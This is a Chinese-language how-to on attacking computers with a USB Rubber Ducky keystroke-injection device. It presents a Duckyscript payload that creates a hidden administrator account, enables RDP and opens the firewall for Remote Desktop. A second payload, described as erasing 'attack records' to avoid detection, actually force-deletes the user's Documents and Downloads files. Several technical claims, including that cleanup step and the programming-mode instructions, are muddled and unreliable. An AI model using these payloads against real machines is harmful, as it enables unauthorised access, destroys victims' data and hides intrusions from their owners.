如何在KaliLinux上使用USBRubberDucky攻击

在黑客攻击中，USB Rubber Ducky是一种非常强大的工具。它是一个外观酷炫的 USB 设备，通过以下方式将键盘的击键模拟成代码，“欺骗”电脑去执行命令，从而让您能够无需访问目标主机即可轻松执行各种攻击。在本文中，我们将为您介绍如何在 KaliLinux 上使用 USB Rubber Ducky 进行攻击。

步骤一：安装USB Rubber Ducky

首先，您需要购买一个 USB Rubber Ducky，或制作一个类似的设备。如果您购买了一个真正的 Rubber Ducky，那么您无需进行任何操作。否则，您需要使用 Arduino 来建立一个类似的设备，或购买一个现成的可编程 HID 设备。

步骤二：准备一个有效载荷

接下来，您需要创建一个有效载荷，也就是 USB Rubber Ducky 的攻击代码。有效载荷是一个脚本，它指示 Rubber Ducky 模拟攻击。您可以使用各种编程语言来创建有效载荷，如 PowerShell、Python 或 Bash。

例如，以下是一个 PowerShell 的有效载荷，它会在目标计算机上创建一个启用了 RDP 的管理员帐户：

REM 开始 DELAY 5000 GUI r DELAY 200 STRING PowerShell Start-Process powershell -Verb runAs ENTER DELAY 1000 STRING New-LocalUser admin ENTER DELAY 500 STRING Net localgroup administrators admin /add ENTER DELAY 1000 STRING Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0 ENTER DELAY 1000 STRING Enable-NetFirewallRule -DisplayGroup "Remote Desktop" ENTER DELAY 1000 REM 结束

步骤三：将有效载荷加载到USB Rubber Ducky上

接下来，需要将有效载荷加载到 USB Rubber Ducky 中。您需要访问 Rubber Ducky 编程模式，这是通过在 Rubber Ducky 连接到计算机时同时按住 Shift 键实现的。您随后可以通过访问 Rubber Ducky 的 firmware 文件，以文本编辑器打开 Duckyscript 脚本文件，再将有效载荷脚本粘贴到其中。

重复这个过程，加载多个有效载荷。

步骤四：执行攻击

现在，您已准备好进行攻击了。将 Rubber Ducky 插入目标计算机，电脑将自动开始模拟攻击。 Rubber Ducky 将模拟您预先编写的脚本，并执行其中的命令，如创建用户账户，是 Windows 系统中的文件或者远程访问等。

步骤五：覆盖攻击记录

请注意，目标计算机上的一些记录可能会记录您的攻击。为了避免被发现，请再次插入 USB Rubber Ducky，并将以下的指令加载到 Duckyscript 中，随后插入 Rubber Ducky 至您的计算机以删除所有的攻击记录。代码如下：

REM 更新最近的文档 DELAY 500 GUI r DELAY 200 STRING cmd /c del /F /Q %userprofile%\\Documents\*.* ENTER DELAY 500 STRING cmd /c del /F /Q %userprofile%\\Downloads\*.* ENTER DELAY 1000 REM 结束

总结

USB Rubber Ducky 已成为越来越多黑客与安全研究人员利用的重要工具之一。其在黑客攻击，代码审计以及渗透测试方面有着广泛的应用。在本文中，我们对如何在 KaliLinux 上使用 USB Rubber Ducky 进行攻击进行了简要介绍，包括安装，准备有效载荷，填充有效载荷，执行攻击，以及删除攻击记录。您应该研究这个工具更多的用法，了解其全方位应用。